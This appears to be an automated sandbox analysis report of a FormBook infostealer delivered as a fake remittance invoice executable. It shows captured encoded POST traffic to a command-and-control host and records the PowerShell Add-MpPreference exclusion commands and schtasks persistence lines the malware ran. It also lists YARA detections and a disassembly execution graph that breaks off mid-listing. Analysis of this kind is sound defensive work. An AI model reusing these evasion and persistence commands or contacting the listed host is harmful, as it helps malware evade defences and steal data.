                                          Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                          Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          54192.168.2.549769217.70.184.50806408C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe
                                          TimestampBytes transferredDirectionData
                                          May 27, 2024 12:46:11.596506119 CEST776OUTPOST /fr5e/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          Host: www.tranivel.com
                                          Origin: http://www.tranivel.com
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Cache-Control: no-cache
                                          Content-Length: 227
                                          Referer: http://www.tranivel.com/fr5e/
                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                          Data Raw: 34 62 33 34 68 74 3d 7a 39 6d 74 39 72 73 63 36 2f 63 2f 42 4a 69 34 36 33 62 75 65 4e 39 6b 4d 74 48 62 2f 71 45 38 66 51 36 7a 39 4a 33 4d 7a 67 53 36 66 77 35 6b 65 44 39 6a 54 50 37 62 43 41 2f 37 2f 59 5a 77 62 6a 53 62 31 79 39 72 74 71 35 33 4f 2f 38 65 47 36 42 33 67 76 52 6b 55 71 65 74 33 71 58 78 45 78 47 36 52 4c 73 54 54 30 58 46 4d 77 64 7a 55 51 4f 32 69 6d 6e 52 4a 45 32 54 4f 79 4b 4a 71 57 54 4a 39 78 54 34 4a 65 69 6d 68 52 46 79 7a 42 74 32 6c 36 33 49 2b 44 46 56 43 62 69 34 41 36 33 49 30 77 54 36 65 42 31 5a 58 71 4b 53 50 51 64 67 38 7a 37 5a 53 4c 38 64 46 4b 48 79 50 2b 4c 71 53 42 70 47 57 4b 66 31 52 34 77 36 6c 6d 76 6e 42 64 58 72 77 4e 43 2b
                                          Data Ascii: 4b34ht=z9mt9rsc6/c/BJi463bueN9kMtHb/qE8fQ6z9J3MzgS6fw5keD9jTP7bCA/7/YZwbjSb1y9rtq53O/8eG6B3gvRkUqet3qXxExG6RLsTT0XFMwdzUQO2imnRJE2TOyKJqWTJ9xT4JeimhRFyzBt2l63I+DFVCbi4A63I0wT6eB1ZXqKSPQdg8z7ZSL8dFKHyP+LqSBpGWKf1R4w6lmvnBdXrwNC+
                                          May 27, 2024 12:46:12.196279049 CEST608INHTTP/1.1 501 Unsupported method ('POST')
                                          Server: nginx
                                          Date: Mon, 27 May 2024 10:46:12 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                          Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          55192.168.2.549770217.70.184.5080
                                          TimestampBytes transferredDirectionData
                                          May 27, 2024 12:46:14.564163923 CEST1793OUTPOST /fr5e/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          Host: www.tranivel.com
                                          Origin: http://www.tranivel.com
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Cache-Control: no-cache
                                          Content-Length: 1243
                                          Referer: http://www.tranivel.com/fr5e/
                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                          Data Raw: 34 62 33 34 68 74 3d 7a 39 6d 74 39 72 73 63 36 2f 63 2f 42 4a 69 34 36 33 62 75 65 4e 39 6b 4d 74 48 62 2f 71 45 38 66 51 36 7a 39 4a 33 4d 7a 67 71 36 66 43 78 6b 65 67 56 6a 63 76 37 62 65 51 2f 34 2f 59 5a 49 62 6a 4b 58 31 79 78 52 74 6f 52 33 4f 63 30 65 41 4c 42 33 71 76 52 6b 4c 36 65 73 35 4b 58 6b 45 78 32 32 52 4b 63 54 54 30 58 46 4d 32 5a 7a 55 44 57 32 67 6d 6e 51 42 6b 32 66 64 69 4c 6d 71 57 62 7a 39 78 47 44 4a 75 43 6d 68 78 56 79 78 7a 46 32 35 71 33 47 39 44 46 33 43 62 65 64 41 36 61 33 30 7a 50 51 65 42 4e 5a 47 4f 6e 74 49 6a 4e 5a 6f 46 33 69 56 59 38 71 61 50 72 65 43 64 6e 68 61 69 4e 2f 56 35 48 41 58 4d 41 71 6d 43 2b 58 65 36 66 39 79 4e 6a 6b 49 6c 36 53 4d 43 67 6f 68 67 7a 66 58 2b 79 44 6c 67 78 5a 54 64 4e 2b 61 6c 52 74 4a 4f 4d 43 70 51 37 79 46 50 78 71 30 42 39 7a 30 57 35 35 4c 4e 39 62 51 31 52 59 75 4d 61 6c 58 30 52 77 59 44 2f 65 68 37 6e 6e 7a 38 6f 63 57 49 7a 50 6f 71 77 45 67 4b 33 48 6d 74 56 5a 64 62 6f 67 79 79 47 6c 66 48 4e 58 55 42 34 76 34 39 57 [TRUNCATED]
                                          Data Ascii: 4b34ht=z9mt9rsc6/c/BJi463bueN9kMtHb/qE8fQ6z9J3Mzgq6fCxkegVjcv7beQ/4/YZIbjKX1yxRtoR3Oc0eALB3qvRkL6es5KXkEx22RKcTT0XFM2ZzUDW2gmnQBk2fdiLmqWbz9xGDJuCmhxVyxzF25q3G9DF3CbedA6a30zPQeBNZGOntIjNZoF3iVY8qaPreCdnhaiN/V5HAXMAqmC+Xe6f9yNjkIl6SMCgohgzfX+yDlgxZTdN+alRtJOMCpQ7yFPxq0B9z0W55LN9bQ1RYuMalX0RwYD/eh7nnz8ocWIzPoqwEgK3HmtVZdbogyyGlfHNXUB4v49WtfOSCWKhQ/9n2GBft7jRHXNTavrUqUVRUVQxPHqX4FJiLS4NLlp3RibpgKkL3pURIRqz3I0DlOFq9aNCFFAzzuXyLZLs6glLqm/ro+HW0pD3tz2uDzWnGO8IxPRsFWDh69kQUcctt10kYgbMsYi1ng4HSUDXLSSG9EKbBfTZ65w5iy9NbiaM6Gg0n4BrwlodnZDCs39jm8hm70+KX2x0BqRIJCFNA9Djkd9ZyvMEiXF2R/0aR7nNWO1FVOutot0M5NW0Tgmd6ljbDhmBC7bovJbW3lGSHsbFASGrGnbP4Q/hARUQje3gTuYL9yFVGJBxhVW148mR3wZHN7BZ1mh3FR/D1ZY8bw1nVeXcl/o8eNsgmBB/2QiGxuwm4QyJdeF2CHFVyP1C1BA78NILEYlRzuL0vADGHY1snBEWEa8V4r5lA21l+iGNKEapc4QZxzu+pvMuSMXEEFGlh85576JCPNZ+leKkZNVMBknR4zjN6WBd6exe7yiz8USI8BpkdLZyKYsJA9Qu3Eq7DE7aSl00o5qgbtAx5vhS36kiv7lbgs8DmAPQjp1moLaAkfHoFXvqgF6Cs9JE6oqgmu98RpkJT4euWYV44XT1o2BZEz1p7cH9OjLJ3nBPRB/OUBlncVfCTKQRbU9UoA+6RGrt1uMQcYqbmsKvxGgHbY [TRUNCATED]
                                          May 27, 2024 12:46:15.179610014 CEST608INHTTP/1.1 501 Unsupported method ('POST')
                                          Server: nginx
                                          Date: Mon, 27 May 2024 10:46:15 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                          Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                          Statistics

                                          CPU Usage

                                          Click to jump to process

                                          Memory Usage

                                          Click to jump to process

                                          High Level Behavior Distribution

                                          Click to dive into process behavior distribution

                                          Behavior

                                          Click to jump to process

                                          System Behavior

                                          General

                                          Target ID:0
                                          Start time:06:42:06
                                          Start date:27/05/2024
                                          Path:C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe"
                                          Imagebase:0x400000
                                          File size:694'272 bytes
                                          MD5 hash:7BFC6728400D041F90F6DD5B3F67AA38
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:low
                                          Has exited:true

                                          General

                                          Target ID:3
                                          Start time:06:42:07
                                          Start date:27/05/2024
                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe"
                                          Imagebase:0xc30000
                                          File size:433'152 bytes
                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:4
                                          Start time:06:42:07
                                          Start date:27/05/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff6d64d0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:5
                                          Start time:06:42:08
                                          Start date:27/05/2024
                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\GRogNEHvcL.exe"
                                          Imagebase:0xc30000
                                          File size:433'152 bytes
                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:6
                                          Start time:06:42:08
                                          Start date:27/05/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff6d64d0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:7
                                          Start time:06:42:08
                                          Start date:27/05/2024
                                          Path:C:\Windows\SysWOW64\schtasks.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GRogNEHvcL" /XML "C:\Users\user\AppData\Local\Temp\tmp16FF.tmp"
                                          Imagebase:0x210000
                                          File size:187'904 bytes
                                          MD5 hash:48C2FE20575769DE916F48EF0676A965
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:8
                                          Start time:06:42:08
                                          Start date:27/05/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff6d64d0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:9
                                          Start time:06:42:09
                                          Start date:27/05/2024
                                          Path:C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe"
                                          Imagebase:0xca0000
                                          File size:694'272 bytes
                                          MD5 hash:7BFC6728400D041F90F6DD5B3F67AA38
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.2334768976.0000000001AB0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.2334768976.0000000001AB0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.2332025821.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.2332025821.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.2334955851.0000000001C50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.2334955851.0000000001C50000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                          Reputation:low
                                          Has exited:true

                                          General

                                          Target ID:10
                                          Start time:06:42:10
                                          Start date:27/05/2024
                                          Path:C:\Users\user\AppData\Roaming\GRogNEHvcL.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Users\user\AppData\Roaming\GRogNEHvcL.exe
                                          Imagebase:0x760000
                                          File size:694'272 bytes
                                          MD5 hash:7BFC6728400D041F90F6DD5B3F67AA38
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Antivirus matches:
                                          • Detection: 100%, Joe Sandbox ML
                                          • Detection: 42%, ReversingLabs
                                          Reputation:low
                                          Has exited:true

                                          General

                                          Target ID:11
                                          Start time:06:42:12
                                          Start date:27/05/2024
                                          Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                          Imagebase:0x7ff6ef0c0000
                                          File size:496'640 bytes
                                          MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                          Has elevated privileges:true
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:12
                                          Start time:06:42:14
                                          Start date:27/05/2024
                                          Path:C:\Windows\SysWOW64\schtasks.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GRogNEHvcL" /XML "C:\Users\user\AppData\Local\Temp\tmp30FF.tmp"
                                          Imagebase:0x210000
                                          File size:187'904 bytes
                                          MD5 hash:48C2FE20575769DE916F48EF0676A965
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:13
                                          Start time:06:42:15
                                          Start date:27/05/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff6d64d0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:14
                                          Start time:06:42:15
                                          Start date:27/05/2024
                                          Path:C:\Users\user\AppData\Roaming\GRogNEHvcL.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\AppData\Roaming\GRogNEHvcL.exe"
                                          Imagebase:0xf60000
                                          File size:694'272 bytes
                                          MD5 hash:7BFC6728400D041F90F6DD5B3F67AA38
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:low
                                          Has exited:true

                                          General

                                          Target ID:16
                                          Start time:06:42:29
                                          Start date:27/05/2024
                                          Path:C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe"
                                          Imagebase:0xf00000
                                          File size:140'800 bytes
                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000010.00000002.4495209551.00000000026F0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000010.00000002.4495209551.00000000026F0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                          Reputation:high
                                          Has exited:false

                                          General

                                          Target ID:17
                                          Start time:06:42:30
                                          Start date:27/05/2024
                                          Path:C:\Windows\SysWOW64\winver.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\SysWOW64\winver.exe"
                                          Imagebase:0x240000
                                          File size:57'344 bytes
                                          MD5 hash:B5471B0FB5402FC318C82C994C6BF84D
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000011.00000002.4495210628.0000000004C40000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000011.00000002.4495210628.0000000004C40000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000011.00000002.4495268104.0000000004C80000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000011.00000002.4495268104.0000000004C80000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000011.00000002.4493681409.0000000002D20000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000011.00000002.4493681409.0000000002D20000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                          Reputation:moderate
                                          Has exited:false

                                          General

                                          Target ID:18
                                          Start time:06:42:43
                                          Start date:27/05/2024
                                          Path:C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe"
                                          Imagebase:0xf00000
                                          File size:140'800 bytes
                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000012.00000002.4497473931.0000000005920000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000012.00000002.4497473931.0000000005920000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                          Reputation:high
                                          Has exited:false

                                          General

                                          Target ID:21
                                          Start time:06:42:55
                                          Start date:27/05/2024
                                          Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                          Imagebase:0x7ff79f9e0000
                                          File size:676'768 bytes
                                          MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Disassembly

                                          Reset < >

                                            Execution Graph

                                            Execution Coverage:9.5%
                                            Dynamic/Decrypted Code Coverage:100%
                                            Signature Coverage:0%
                                            Total number of Nodes:279
                                            Total number of Limit Nodes:13
                                            execution_graph 30190 e3d751 30191 e3d714 DuplicateHandle 30190->30191 30193 e3d75a 30190->30193 30192 e3d726 30191->30192 29942 e3d040 29943 e3d086 GetCurrentProcess 29942->29943 29945 e3d0d8 GetCurrentThread 29943->29945 29949 e3d0d1 29943->29949 29946 e3d115 GetCurrentProcess 29945->29946 29947 e3d10e 29945->29947 29948 e3d14b 29946->29948 29947->29946 29950 e3d173 GetCurrentThreadId 29948->29950 29949->29945 29951 e3d1a4 29950->29951 29952 6be595a 29957 6be84ab 29952->29957 29981 6be8512 29952->29981 30005 6be84b8 29952->30005 29953 6be5969 29958 6be8464 29957->29958 29959 6be84b7 29957->29959 29958->29953 30028 6be8ddc 29959->30028 30033 6be8984 29959->30033 30038 6be89a9 29959->30038 30042 6be8ba9 29959->30042 30046 6be88a9 29959->30046 30054 6be8a88 29959->30054 30066 6be8a6a 29959->30066 30072 6be8aea 29959->30072 30077 6be8fca 29959->30077 30086 6be8ecf 29959->30086 30091 6be908f 29959->30091 30096 6be902e 29959->30096 30101 6be8931 29959->30101 30109 6be8b53 29959->30109 30114 6be8bf7 29959->30114 30119 6be8a56 29959->30119 30123 6be8a1a 29959->30123 30127 6be8d1d 29959->30127 30133 6be8a9c 29959->30133 30137 6be89fc 29959->30137 29960 6be84da 29960->29953 29982 6be84c4 29981->29982 29984 6be8517 29981->29984 29985 6be8ddc 2 API calls 29982->29985 29986 6be89fc 4 API calls 29982->29986 29987 6be8a9c 2 API calls 29982->29987 29988 6be8d1d 2 API calls 29982->29988 29989 6be8a1a ReadProcessMemory 29982->29989 29990 6be8a56 ReadProcessMemory 29982->29990 29991 6be8bf7 2 API calls 29982->29991 29992 6be8b53 2 API calls 29982->29992 29993 6be8931 4 API calls 29982->29993 29994 6be902e 2 API calls 29982->29994 29995 6be908f 2 API calls 29982->29995 29996 6be8ecf 2 API calls 29982->29996 29997 6be8fca 4 API calls 29982->29997 29998 6be8aea 2 API calls 29982->29998 29999 6be8a6a 2 API calls 29982->29999 30000 6be8a88 6 API calls 29982->30000 30001 6be88a9 4 API calls 29982->30001 30002 6be8ba9 ReadProcessMemory 29982->30002 30003 6be89a9 2 API calls 29982->30003 30004 6be8984 2 API calls 29982->30004 29983 6be84da 29983->29953 29984->29953 29985->29983 29986->29983 29987->29983 29988->29983 29989->29983 29990->29983 29991->29983 29992->29983 29993->29983 29994->29983 29995->29983 29996->29983 29997->29983 29998->29983 29999->29983 30000->29983 30001->29983 30002->29983 30003->29983 30004->29983 30006 6be84d2 30005->30006 30008 6be8ddc 2 API calls 30006->30008 30009 6be89fc 4 API calls 30006->30009 30010 6be8a9c 2 API calls 30006->30010 30011 6be8d1d 2 API calls 30006->30011 30012 6be8a1a ReadProcessMemory 30006->30012 30013 6be8a56 ReadProcessMemory 30006->30013 30014 6be8bf7 2 API calls 30006->30014 30015 6be8b53 2 API calls 30006->30015 30016 6be8931 4 API calls 30006->30016 30017 6be902e 2 API calls 30006->30017 30018 6be908f 2 API calls 